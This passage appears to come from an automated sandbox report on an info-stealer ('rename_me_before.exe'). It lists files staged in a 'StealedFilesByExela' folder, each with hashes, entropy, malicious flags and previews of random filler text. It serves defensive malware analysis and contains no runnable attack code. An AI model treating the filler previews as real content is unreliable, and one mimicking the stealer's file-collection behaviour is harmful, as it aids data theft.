                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UMMBDNEQBN.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UMMBDNEQBN.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UOOJJOZIRH.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                          MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                          SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                          SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                          SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\WKXEWIOTXI.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                                          MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                                          SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                                          SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                                          SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\XZXHAVGRAG.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\XZXHAVGRAG.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
